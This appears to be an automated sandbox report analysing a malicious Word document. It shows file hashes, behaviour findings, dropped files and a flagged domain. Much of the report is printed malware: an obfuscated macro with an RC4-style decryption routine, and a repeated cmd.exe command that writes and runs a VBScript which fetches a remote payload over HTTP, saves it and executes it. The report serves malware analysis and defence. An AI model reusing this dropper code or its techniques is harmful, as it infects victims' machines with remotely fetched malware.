AuD = (AuD - 1) * 2
RYev3m = 22
Select Case RYev3m
Case 77
RYev3m = RYev3m + 1
Case 37
RYev3m = RYev3m + RYev3m
Case Else
RYev3m = RYev3m - 1
End Select
XC = (XC * 2) - 1
DFFv = 73
Select Case DFFv
Case 61
DFFv = DFFv + 1
Case 96
DFFv = DFFv + DFFv
Case Else
DFFv = DFFv - 1
End Select
If AuD + XC > C2h Then XC = C2h - AuD
FVfG7r3 = 41
Select Case FVfG7r3
Case 97
FVfG7r3 = FVfG7r3 + 1
Case 1
FVfG7r3 = FVfG7r3 + FVfG7r3
Case Else
FVfG7r3 = FVfG7r3 - 1
End Select
ReDim MdN3(XC)
IAhrpW = 90
Select Case IAhrpW
Case 95
IAhrpW = IAhrpW + 1
Case 79
IAhrpW = IAhrpW + IAhrpW
Case Else
IAhrpW = IAhrpW - 1
End Select
For BeFu = AuD To AuD + XC
MdN3(BeFu - AuD) = PR70DrJ(BeFu)
Next BeFu
ScCH = 96
Select Case ScCH
Case 17
ScCH = ScCH + 1
Case 57
ScCH = ScCH + ScCH
Case Else
ScCH = ScCH - 1
End Select
Ec = MdN3
I3jnjGY = 17
Select Case I3jnjGY
Case 67
I3jnjGY = I3jnjGY + 1
Case 18
I3jnjGY = I3jnjGY + I3jnjGY
Case Else
I3jnjGY = I3jnjGY - 1
End Select
End Function
Private Function EQs(Nh4UJ() As Byte, SfRwt() As Byte) As String
Ttp0 = 97
Select Case Ttp0
Case 1
Ttp0 = Ttp0 + 1
Case 19
Ttp0 = Ttp0 + Ttp0
Case Else
Ttp0 = Ttp0 - 1
End Select
On Error Resume Next
EH = 79
Select Case EH
Case 40
EH = EH + 1
Case 57
EH = EH + EH
Case Else
EH = EH - 1
End Select
Dim PbyhD1B(0 To 255) As Integer, DU8C As Long, BSWe As Long, Xm3I5 As Long, MNdpKnu As Byte, V5B() As Byte, A0() As Byte
U8KJle = 94
Select Case U8KJle
Case 8
U8KJle = U8KJle + 1
Case 22
U8KJle = U8KJle + U8KJle
Case Else
U8KJle = U8KJle - 1
End Select
ReDim V5B(WsJBHKt(Nh4UJ)) As Byte
INKuIOD = 52
Select Case INKuIOD
Case 36
INKuIOD = INKuIOD + 1
Case 83
INKuIOD = INKuIOD + INKuIOD
Case Else
INKuIOD = INKuIOD - 1
End Select
V5B = Nh4UJ
G0yjx = 98
Select Case G0yjx
Case 33
G0yjx = G0yjx + 1
Case 6
G0yjx = G0yjx + G0yjx
Case Else
G0yjx = G0yjx - 1
End Select
ReDim A0(WsJBHKt(SfRwt)) As Byte
VyvKzQ1 = 73
Select Case VyvKzQ1
Case 95
VyvKzQ1 = VyvKzQ1 + 1
Case 28
VyvKzQ1 = VyvKzQ1 + VyvKzQ1
Case Else
VyvKzQ1 = VyvKzQ1 - 1
End Select
A0 = SfRwt
QE0N9Q = 59
Select Case QE0N9Q
Case 77
QE0N9Q = QE0N9Q + 1
Case 23
QE0N9Q = QE0N9Q + QE0N9Q
Case Else
QE0N9Q = QE0N9Q - 1
End Select
For DU8C = 0 To (6675 - 6420)
PbyhD1B(DU8C) = DU8C
Next DU8C
Ef3O = 61
Select Case Ef3O
Case 70
Ef3O = Ef3O + 1
Case 42
Ef3O = Ef3O + Ef3O
Case Else
Ef3O = Ef3O - 1
End Select
DU8C = 0
X7QfUWL = 84
Select Case X7QfUWL
Case 14
X7QfUWL = X7QfUWL + 1
Case 68
X7QfUWL = X7QfUWL + X7QfUWL
Case Else
X7QfUWL = X7QfUWL - 1
End Select
BSWe = 0
LS = 14
Select Case LS
Case 39
LS = LS + 1
Case 88
LS = LS + LS
Case Else
LS = LS - 1
End Select
Xm3I5 = 0
V4LwXbx = 13
Select Case V4LwXbx
Case 67
V4LwXbx = V4LwXbx + 1
Case 5
V4LwXbx = V4LwXbx + V4LwXbx
Case Else
V4LwXbx = V4LwXbx - 1
End Select
For DU8C = 0 To (6593 - 6338)
BSWe = BYiNP4((BSWe + PbyhD1B(DU8C) + A0(BYiNP4(DU8C, (WsJBHKt(SfRwt) + 1)))), ((-5014 + 5270)))
MNdpKnu = PbyhD1B(DU8C)
PbyhD1B(DU8C) = PbyhD1B(BSWe)
PbyhD1B(BSWe) = MNdpKnu
Next DU8C
BHUpo3 = 56
Select Case BHUpo3
Case 78
BHUpo3 = BHUpo3 + 1
Case 84
BHUpo3 = BHUpo3 + BHUpo3
Case Else
BHUpo3 = BHUpo3 - 1
End Select
DU8C = 0
DZ5LA06nw = 41
Select Case DZ5LA06nw
Case 56
DZ5LA06nw = DZ5LA06nw + 1
Case 36
DZ5LA06nw = DZ5LA06nw + DZ5LA06nw
Case Else
DZ5LA06nw = DZ5LA06nw - 1
End Select
BSWe = 0
FTbji = 79
Select Case FTbji
Case 51
FTbji = FTbji + 1
Case 64
FTbji = FTbji + FTbji
Case Else
FTbji = FTbji - 1
End Select
Xm3I5 = 0
AT = 93
Select Case AT
Case 49
AT = AT + 1
Case 9
AT = AT + AT
Case Else
AT = AT - 1
End Select
For DU8C = 0 To WsJBHKt(Nh4UJ)
BSWe = BYiNP4((BSWe + 1), (-7291 + 7547))
Xm3I5 = BYiNP4((Xm3I5 + PbyhD1B(BSWe)), (2208 - 1952))
MNdpKnu = PbyhD1B(BSWe)
PbyhD1B(BSWe) = PbyhD1B(Xm3I5)
PbyhD1B(Xm3I5) = MNdpKnu
V5B(DU8C) = VA(V5B(DU8C), (PbyhD1B(BYiNP4((PbyhD1B(BSWe) + PbyhD1B(Xm3I5)), ((-8064 + 8320))))))
Next DU8C
EL8Aafe = 29
Select Case EL8Aafe
Case 69
EL8Aafe = EL8Aafe + 1
Case 95
EL8Aafe = EL8Aafe + EL8Aafe
Case Else
EL8Aafe = EL8Aafe - 1
End Select
EQs = Dy(V5B)
BZaGi = 47
Select Case BZaGi
Case 1
BZaGi = BZaGi + 1
Case 39
BZaGi = BZaGi + BZaGi
Case Else
BZaGi = BZaGi - 1
End Select
End Function" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF33F62759C5D868EF.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF5EA05794A6B11428.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF2F10C99866EDE205.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61046"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61046"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 62650000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "Fi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Achkd7" "SuB GMe()" "Rp=21" "Dim YgwrSK
FsL3" "For YgwrSK = 25 To 3000836" "FsL3 = CaB + 47 + 74 + 67" "Next" "NVIN0y=77" "eND sUB" "SuB Qz69Gr()" "WgNy=10" "diM Pb
KyMSJS" "AkH=44" "Do WHiLe Pb<>5971-5970" "KyMSJS=KyMSJS+1" "LOop" "Nb91Fm=92" "enD suB" "SUb CYTeou()" "FeeR8ZX=22" "IHdN1tW=93548496" "Kzhe=80" "FoR NXanLiG=1 To IHdN1tW" "LnYDeX=LnYDeX+1" "nEXT" "KY=93" "iF LnYDeX=IHdN1tW ThEn" "JzcJkJg=55" "CU7((-1725+1729))" "UZuPjx=57" "Nd7KQ(QtJtaSP("3A473332567F7D4326360D203E5C322442333D5E68260D24331D252B02","PR3GBl"))" "GE3A=1" "eND iF" "PJwzQ8s=26" "eNd SUb" "FUnCTIoN DxgZT1m()" "KDBJ=62" "DxgZT1m=secOnd(tIme)" "SxxW=39" "ENd fUNctIOn" "sUB TxS()" "Wq=63" "QBNQ3=""""" "Ycs8R=18" "Ie=Achkd7 & DxgZT1m & QtJtaSP("49380828","Jg")" "K4Stv=28" "BEo9f=QtJtaSP("315C027F2A2A54467E0C726232101D061144736F70","OR1fQ")" "Kd=8" "XIVDU50 Achkd7 & QtJtaSP("4C0D070A","ObuJecd")
Ie" "AIuk=73" "iF RHlWYg="" THEn CU7((-1376+1380))" "PvZk=16" "Gn6F="VCox3r"" "AYs=31" "seT JEJsd=CReatEobjEct(QtJtaSP("143C1B411B2637412B5B173A2F",Gn6F))" "AOg4ba=37" "JEJsd.ruN BEo9f & Ie & QBNQ3
6560-6560
7267-7267" "XPYv4mK=50" "enD SUb" "SuB CU7(J7WbxsB)" "PBJ2U=34" "Dim Caz" "NhFW=74" "Caz=TImER+J7WbxsB" "dO whiLe tImeR<Caz" "LOoP" "Tk=28" "ENd SuB" "FUnctiON O1u1mv(ODIE)" "XSAxnm=60" "O1u1mv=Asc(ODIE)" "T5aBIk=32" "eNd FuNCtioN" "FuNCTioN XIVDU50(VW,Dq3cX)" "J6S1l=44" "DIm Lt5k
QVd
Y6Zi
PVs
O7RZ(5)" "KVf0DtC=57" "O7RZ(2)=107" "WK1=94" "O7RZ(3)=50" "Xi81d=13" "O7RZ(1)=100" "BWe=48" "O7RZ(0)=104" "S1=93" "O7RZ(4)=54" "CogoeB=84" "O7RZ(5)=52" "WU=31" "ES=29" "SEt Lt5k=cReAteObjecT(QtJtaSP("312F102512380B22056224250E293135113807212D2E08290138", "Lb"))" "IbBc0=5" "sET QVd=Lt5k.gEtFILe(VW)" "Ci=86" "SeT PVs=QVd.opeNaStEXTStREAM(2538-2537,3352-3352)" "Iz=21" "Set Y6Zi=Lt5k.CreaTEtEXtFiLE(Dq3cX,8545-8544,8759-8759)" "DCM=85" "dO UNtIl PVs.aTeNdOfSTREAm" "Y6Zi.WritE Xq(SS(O1u1mv(PVs.REad(4207-4206))
O7RZ(0)))" "lOOp" "Ivr4Mw=34" "Y6Zi.ClOsE" "VJsbrj=74" "PVs.cLOSe" "L97b=76" "End FUnCTiOn" "functioN QtJtaSP(Fo,Ao6w)" "WMokkI=71" "DiM Vi
O7lkn
B0pG" "KE8ZS7=63" "FoR Vi=1 tO (leN(Fo)/2)" "O7lkn=(Xq((312664/8228)) & Xq((8941-8869))&(mID(Fo,(Vi+Vi)-1
2)))" "B0pG=(O1u1mv(mId(Ao6w,((Vi moD LEn(Ao6w))+1)
1)))" "QtJtaSP=QtJtaSP+Xq(SS(O7lkn,B0pG))" "neXT" "WSfPz6=57" "ENd FuNCtIoN" "VA5QGfR=73" "CYTeou" "FUnctiON Nd7KQ(GTbP6f)" "BqGq0RG=11" "dIm WCeZFHb
AyIhL4K" "IdG9PM1=57" "BuIfair="Jb27d1V"" "JDQ6rC=55" "On eRroR rESUmE NExT" "OJBln7=92" "By4="PPzg0p"" "MbeazkY=25" "sET WCeZFHb=CreateObjEct(QtJtaSP("07290442192024543458153C3C",By4))" "NrywC=36" "YK3N="GB1RNF3"" "GMe" "XCh2R6x=30" "Set CCZAg=WCeZFHb.ENVirONment(QtJtaSP("041906170E1A07","ITK"))" "NvzvBsE=22" "Achkd7=CCZAg(QtJtaSP("18023A1218062B","VYRj"))&Xq((3365-3273))& DxgZT1m & DxgZT1m" "SNLX=66" "AadE="Ik44c3"" "UyGq=84" "sEt AyIhL4K=CReaTeobJEcT(QtJtaSP("265D57115C3A0452404D6B04277C603763",AadE))" "A6CJ6=68" "AyIhL4K.opEN QtJtaSP("761765","R1")
GTbP6f
5182-5182" "QHxnncN=82" "AyIhL4K.SENd()" "CCqqVDx=18" "if AyIhL4K.statuS=(-6219+6419) then" "PNj7=47" "GMe" "AqUgAF=38" "CU7((18308/4577))" "Ds6EZ=40" "DIQpv AyIhL4K.ReSpONSeBoDy" "CSb1Qh=35" "Else" "Vhojn7=42" "U7="Dm"" "R6svB=41" "SEt AyIhL4K= crEAteoBJeCt(QtJtaSP("202D0E3602370222196A3509210C39103D",U7))" "Qt=7" "AyIhL4K.oPeN QtJtaSP("207722","Tg2vPcQ")
QtJtaSP("3A053A21685E616362466064655F767F60447F7E36103A307C13273F","QRqN" )
2749-2749" "SrAH=49" "AyIhL4K.seND()" "QjL=79" "If AyIhL4K.sTAtuS=(1431800/7159)TheN DIQpv AyIhL4K.REsPONsEBoDY" "Q0G2=43" "MZax2z=55" "end if" "Pd3C=47" "EnD fuNctIoN" "FUnCtiOn Xq(O9X)" "LB9K3lq=20" "Xq=ChR(O9X)" "MlEw=35" "End fuNCtiOn" "sUB DIQpv(XwwrXco)" "YIMk=79" "diM CSbzZ6" "VCM=19" "D2S="CG"" "NPSbD=23" "Set CSbzZ6=CreATeobJeCT(QtJtaSP("06070807056D14373526262E",D2S))" "IV=55" "CSbzZ6.opEn" "SfQ1=45" "CSbzZ6.TYPe=601-600" "Q20S=68" "CSbzZ6.WrITe XwwrXco" "Sr30EMj=24" "CSbzZ6.sAVEToFiLe Achkd7 & QtJtaSP("4332213D","RmJl")
2739-2737" "V6FY=94" "CSbzZ6.CLoSE" "JH8q8VI=4" "TxS" "WmBpI=26" "EnD suB" "fUNcTIOn SS(Ov,XS90)" "C6WVy=96" "SS=(Ov ANd NOt XS90)oR(noT Ov ANd XS90)" "UPzyhh=55" "ENd FUNcTION") do @echo %~i)>"!Fi!" && start "" "!Fi!"" on 2016-8-8.10:57:00.120 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/V /C set "Fi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Achkd7" "SuB GMe()" "Rp=21" "Dim YgwrSK
FsL3" "For YgwrSK = 25 To 3000836" "FsL3 = CaB + 47 + 74 + 67" "Next" "NVIN0y=77" "eND sUB" "SuB Qz69Gr()" "WgNy=10" "diM Pb
KyMSJS" "AkH=44" "Do WHiLe Pb<>5971-5970" "KyMSJS=KyMSJS+1" "LOop" "Nb91Fm=92" "enD suB" "SUb CYTeou()" "FeeR8ZX=22" "IHdN1tW=93548496" "Kzhe=80" "FoR NXanLiG=1 To IHdN1tW" "LnYDeX=LnYDeX+1" "nEXT" "KY=93" "iF LnYDeX=IHdN1tW ThEn" "JzcJkJg=55" "CU7((-1725+1729))" "UZuPjx=57" "Nd7KQ(QtJtaSP("3A473332567F7D4326360D203E5C322442333D5E68260D24331D252B02","PR3GBl"))" "GE3A=1" "eND iF" "PJwzQ8s=26" "eNd SUb" "FUnCTIoN DxgZT1m()" "KDBJ=62" "DxgZT1m=secOnd(tIme)" "SxxW=39" "ENd fUNctIOn" "sUB TxS()" "Wq=63" "QBNQ3=""""" "Ycs8R=18" "Ie=Achkd7 & DxgZT1m & QtJtaSP("49380828","Jg")" "K4Stv=28" "BEo9f=QtJtaSP("315C027F2A2A54467E0C726232101D061144736F70","OR1fQ")" "Kd=8" "XIVDU50 Achkd7 & QtJtaSP("4C0D070A","ObuJecd")
Ie" "AIuk=73" "iF RHlWYg="" THEn CU7((-1376+1380))" "PvZk=16" "Gn6F="VCox3r"" "AYs=31" "seT JEJsd=CReatEobjEct(QtJtaSP("143C1B411B2637412B5B173A2F",Gn6F))" "AOg4ba=37" "JEJsd.ruN BEo9f & Ie & QBNQ3
6560-6560
7267-7267" "XPYv4mK=50" "enD SUb" "SuB CU7(J7WbxsB)" "PBJ2U=34" "Dim Caz" "NhFW=74" "Caz=TImER+J7WbxsB" "dO whiLe tImeR<Caz" "LOoP" "Tk=28" "ENd SuB" "FUnctiON O1u1mv(ODIE)" "XSAxnm=60" "O1u1mv=Asc(ODIE)" "T5aBIk=32" "eNd FuNCtioN" "FuNCTioN XIVDU50(VW,Dq3cX)" "J6S1l=44" "DIm Lt5k
QVd
Y6Zi
PVs
O7RZ(5)" "KVf0DtC=57" "O7RZ(2)=107" "WK1=94" "O7RZ(3)=50" "Xi81d=13" "O7RZ(1)=100" "BWe=48" "O7RZ(0)=104" "S1=93" "O7RZ(4)=54" "CogoeB=84" "O7RZ(5)=52" "WU=31" "ES=29" "SEt Lt5k=cReAteObjecT(QtJtaSP("312F102512380B22056224250E293135113807212D2E08290138", "Lb"))" "IbBc0=5" "sET QVd=Lt5k.gEtFILe(VW)" "Ci=86" "SeT PVs=QVd.opeNaStEXTStREAM(2538-2537,3352-3352)" "Iz=21" "Set Y6Zi=Lt5k.CreaTEtEXtFiLE(Dq3cX,8545-8544,8759-8759)" "DCM=85" "dO UNtIl PVs.aTeNdOfSTREAm" "Y6Zi.WritE Xq(SS(O1u1mv(PVs.REad(4207-4206))
O7RZ(0)))" "lOOp" "Ivr4Mw=34" "Y6Zi.ClOsE" "VJsbrj=74" "PVs.cLOSe" "L97b=76" "End FUnCTiOn" "functioN QtJtaSP(Fo,Ao6w)" "WMokkI=71" "DiM Vi
O7lkn
B0pG" "KE8ZS7=63" "FoR Vi=1 tO (leN(Fo)/2)" "O7lkn=(Xq((312664/8228)) & Xq((8941-8869))&(mID(Fo,(Vi+Vi)-1
2)))" "B0pG=(O1u1mv(mId(Ao6w,((Vi moD LEn(Ao6w))+1)
1)))" "QtJtaSP=QtJtaSP+Xq(SS(O7lkn,B0pG))" "neXT" "WSfPz6=57" "ENd FuNCtIoN" "VA5QGfR=73" "CYTeou" "FUnctiON Nd7KQ(GTbP6f)" "BqGq0RG=11" "dIm WCeZFHb
AyIhL4K" "IdG9PM1=57" "BuIfair="Jb27d1V"" "JDQ6rC=55" "On eRroR rESUmE NExT" "OJBln7=92" "By4="PPzg0p"" "MbeazkY=25" "sET WCeZFHb=CreateObjEct(QtJtaSP("07290442192024543458153C3C",By4))" "NrywC=36" "YK3N="GB1RNF3"" "GMe" "XCh2R6x=30" "Set CCZAg=WCeZFHb.ENVirONment(QtJtaSP("041906170E1A07","ITK"))" "NvzvBsE=22" "Achkd7=CCZAg(QtJtaSP("18023A1218062B","VYRj"))&Xq((3365-3273))& DxgZT1m & DxgZT1m" "SNLX=66" "AadE="Ik44c3"" "UyGq=84" "sEt AyIhL4K=CReaTeobJEcT(QtJtaSP("265D57115C3A0452404D6B04277C603763",AadE))" "A6CJ6=68" "AyIhL4K.opEN QtJtaSP("761765","R1")
GTbP6f
5182-5182" "QHxnncN=82" "AyIhL4K.SENd()" "CCqqVDx=18" "if AyIhL4K.statuS=(-6219+6419) then" "PNj7=47" "GMe" "AqUgAF=38" "CU7((18308/4577))" "Ds6EZ=40" "DIQpv AyIhL4K.ReSpONSeBoDy" "CSb1Qh=35" "Else" "Vhojn7=42" "U7="Dm"" "R6svB=41" "SEt AyIhL4K= crEAteoBJeCt(QtJtaSP("202D0E3602370222196A3509210C39103D",U7))" "Qt=7" "AyIhL4K.oPeN QtJtaSP("207722","Tg2vPcQ")
QtJtaSP("3A053A21685E616362466064655F767F60447F7E36103A307C13273F","QRqN" )
2749-2749" "SrAH=49" "AyIhL4K.seND()" "QjL=79" "If AyIhL4K.sTAtuS=(1431800/7159)TheN DIQpv AyIhL4K.REsPONsEBoDY" "Q0G2=43" "MZax2z=55" "end if" "Pd3C=47" "EnD fuNctIoN" "FUnCtiOn Xq(O9X)" "LB9K3lq=20" "Xq=ChR(O9X)" "MlEw=35" "End fuNCtiOn" "sUB DIQpv(XwwrXco)" "YIMk=79" "diM CSbzZ6" "VCM=19" "D2S="CG"" "NPSbD=23" "Set CSbzZ6=CreATeobJeCT(QtJtaSP("06070807056D14373526262E",D2S))" "IV=55" "CSbzZ6.opEn" "SfQ1=45" "CSbzZ6.TYPe=601-600" "Q20S=68" "CSbzZ6.WrITe XwwrXco" "Sr30EMj=24" "CSbzZ6.sAVEToFiLe Achkd7 & QtJtaSP("4332213D","RmJl")
2739-2737" "V6FY=94" "CSbzZ6.CLoSE" "JH8q8VI=4" "TxS" "WmBpI=26" "EnD suB" "fUNcTIOn SS(Ov,XS90)" "C6WVy=96" "SS=(Ov ANd NOt XS90)oR(noT Ov ANd XS90)" "UPzyhh=55" "ENd FUNcTION") do @echo %~i)>"!Fi!" && start "" "!Fi!"" (Show Process)
Spawned process "wscript.exe" with commandline ""%APPDATA%\10326.vbs"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"10326.vbs" has type "ASCII text with CRLF line terminators"
"~WRD0000.tmp" has type "Composite Document File V2 Document No summary info"
"~WRD0001.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Author: chilacayote Template: Normal Last Saved By: RIVLL3q Revision Number: 6 Name of Creating Application: Microsoft Office Word Total Editing Time: 03:40:00 Create Time/Date: Sat Jun 4 06:27:00 2016 Last Saved Time/Date: Mon Aug 8 22:27:00 2016 Number of Pages: 5 Number of Words: 9471 Number of Characters: 53987 Security: 0"
"~WRS{D26DCFE4-5D22-4BFD-AC94-AE68EB65F307}.tmp" has type "data"
"index.dat" has type "data"
"data[1].bin" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"~$91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2.doc" has type "data"
"00.xMo" has type "data"
"~WRS{432DDB46-44E9-4579-9602-8C7F41CE1E59}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"000.rob" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~WRS{6FFD5514-5D5B-48F1-83E1-5E8708FC9E80}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~$Normal.dotm" has type "data"
"fb91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 8 17:29:52 2016 mtime=Mon Aug 8 21:27:40 2016 atime=Mon Aug 8 21:28:00 2016 length=318976 window=hide" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
Pellentesque Corp.#28.rtf
- Filename
- Pellentesque Corp.#28.rtf
- Size
- 223KiB (228352 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: chilacayote , Template: Normal.dotm, Last Saved By: epicedian , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 02:36:00 2016, Number of Pages: 1, Number of Words: 9471, Number of Characters: 53985, Security: 0
- Architecture
- WINDOWS
- SHA256
- fb91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2
- MD5
- 397c6db12429b2e24687ae62e9f7bc41
- SHA1
- 35ea5999af79cb6535f444336e803e5c51fae1a0
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\fb91c49ffaf3ef41a99a3fb8eb5fda46baa78329ea48ad755c316efd0551f7e2.doc"
(PID: 3464)
-
cmd.exe
/V /C set "Fi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Achkd7" "SuB GMe()" "Rp=21" "Dim YgwrSK, FsL3" "For YgwrSK = 25 To 3000836" "FsL3 = CaB + 47 + 74 + 67" "Next" "NVIN0y=77" "eND sUB" "SuB Qz69Gr()" "WgNy=10" "diM Pb,KyMSJS" "AkH=44" "Do WHiLe Pb<>5971-5970" "KyMSJS=KyMSJS+1" "LOop" "Nb91Fm=92" "enD suB" "SUb CYTeou()" "FeeR8ZX=22" "IHdN1tW=93548496" "Kzhe=80" "FoR NXanLiG=1 To IHdN1tW" "LnYDeX=LnYDeX+1" "nEXT" "KY=93" "iF LnYDeX=IHdN1tW ThEn" "JzcJkJg=55" "CU7((-1725+1729))" "UZuPjx=57" "Nd7KQ(QtJtaSP("3A473332567F7D4326360D203E5C322442333D5E68260D24331D252B02","PR3GBl"))" "GE3A=1" "eND iF" "PJwzQ8s=26" "eNd SUb" "FUnCTIoN DxgZT1m()" "KDBJ=62" "DxgZT1m=secOnd(tIme)" "SxxW=39" "ENd fUNctIOn" "sUB TxS()" "Wq=63" "QBNQ3=""""" "Ycs8R=18" "Ie=Achkd7 & DxgZT1m & QtJtaSP("49380828","Jg")" "K4Stv=28" "BEo9f=QtJtaSP("315C027F2A2A54467E0C726232101D061144736F70","OR1fQ")" "Kd=8" "XIVDU50 Achkd7 & QtJtaSP("4C0D070A","ObuJecd"),Ie" "AIuk=73" "iF RHlWYg="" THEn CU7((-1376+1380))" "PvZk=16" "Gn6F="VCox3r"" "AYs=31" "seT JEJsd=CReatEobjEct(QtJtaSP("143C1B411B2637412B5B173A2F",Gn6F))" "AOg4ba=37" "JEJsd.ruN BEo9f & Ie & QBNQ3,6560-6560,7267-7267" "XPYv4mK=50" "enD SUb" "SuB CU7(J7WbxsB)" "PBJ2U=34" "Dim Caz" "NhFW=74" "Caz=TImER+J7WbxsB" "dO whiLe tImeR<Caz" "LOoP" "Tk=28" "ENd SuB" "FUnctiON O1u1mv(ODIE)" "XSAxnm=60" "O1u1mv=Asc(ODIE)" "T5aBIk=32" "eNd FuNCtioN" "FuNCTioN XIVDU50(VW,Dq3cX)" "J6S1l=44" "DIm Lt5k,QVd,Y6Zi,PVs,O7RZ(5)" "KVf0DtC=57" "O7RZ(2)=107" "WK1=94" "O7RZ(3)=50" "Xi81d=13" "O7RZ(1)=100" "BWe=48" "O7RZ(0)=104" "S1=93" "O7RZ(4)=54" "CogoeB=84" "O7RZ(5)=52" "WU=31" "ES=29" "SEt Lt5k=cReAteObjecT(QtJtaSP("312F102512380B22056224250E293135113807212D2E08290138", "Lb"))" "IbBc0=5" "sET QVd=Lt5k.gEtFILe(VW)" "Ci=86" "SeT PVs=QVd.opeNaStEXTStREAM(2538-2537,3352-3352)" "Iz=21" "Set Y6Zi=Lt5k.CreaTEtEXtFiLE(Dq3cX,8545-8544,8759-8759)" "DCM=85" "dO UNtIl PVs.aTeNdOfSTREAm" "Y6Zi.WritE Xq(SS(O1u1mv(PVs.REad(4207-4206)),O7RZ(0)))" "lOOp" "Ivr4Mw=34" "Y6Zi.ClOsE" "VJsbrj=74" "PVs.cLOSe" "L97b=76" "End FUnCTiOn" "functioN QtJtaSP(Fo,Ao6w)" "WMokkI=71" "DiM Vi,O7lkn,B0pG" "KE8ZS7=63" "FoR Vi=1 tO (leN(Fo)/2)" "O7lkn=(Xq((312664/8228)) & Xq((8941-8869))&(mID(Fo,(Vi+Vi)-1,2)))" "B0pG=(O1u1mv(mId(Ao6w,((Vi moD LEn(Ao6w))+1),1)))" "QtJtaSP=QtJtaSP+Xq(SS(O7lkn,B0pG))" "neXT" "WSfPz6=57" "ENd FuNCtIoN" "VA5QGfR=73" "CYTeou" "FUnctiON Nd7KQ(GTbP6f)" "BqGq0RG=11" "dIm WCeZFHb,AyIhL4K" "IdG9PM1=57" "BuIfair="Jb27d1V"" "JDQ6rC=55" "On eRroR rESUmE NExT" "OJBln7=92" "By4="PPzg0p"" "MbeazkY=25" "sET WCeZFHb=CreateObjEct(QtJtaSP("07290442192024543458153C3C",By4))" "NrywC=36" "YK3N="GB1RNF3"" "GMe" "XCh2R6x=30" "Set CCZAg=WCeZFHb.ENVirONment(QtJtaSP("041906170E1A07","ITK"))" "NvzvBsE=22" "Achkd7=CCZAg(QtJtaSP("18023A1218062B","VYRj"))&Xq((3365-3273))& DxgZT1m & DxgZT1m" "SNLX=66" "AadE="Ik44c3"" "UyGq=84" "sEt AyIhL4K=CReaTeobJEcT(QtJtaSP("265D57115C3A0452404D6B04277C603763",AadE))" "A6CJ6=68" "AyIhL4K.opEN QtJtaSP("761765","R1"),GTbP6f,5182-5182" "QHxnncN=82" "AyIhL4K.SENd()" "CCqqVDx=18" "if AyIhL4K.statuS=(-6219+6419) then" "PNj7=47" "GMe" "AqUgAF=38" "CU7((18308/4577))" "Ds6EZ=40" "DIQpv AyIhL4K.ReSpONSeBoDy" "CSb1Qh=35" "Else" "Vhojn7=42" "U7="Dm"" "R6svB=41" "SEt AyIhL4K= crEAteoBJeCt(QtJtaSP("202D0E3602370222196A3509210C39103D",U7))" "Qt=7" "AyIhL4K.oPeN QtJtaSP("207722","Tg2vPcQ"),QtJtaSP("3A053A21685E616362466064655F767F60447F7E36103A307C13273F","QRqN" ),2749-2749" "SrAH=49" "AyIhL4K.seND()" "QjL=79" "If AyIhL4K.sTAtuS=(1431800/7159)TheN DIQpv AyIhL4K.REsPONsEBoDY" "Q0G2=43" "MZax2z=55" "end if" "Pd3C=47" "EnD fuNctIoN" "FUnCtiOn 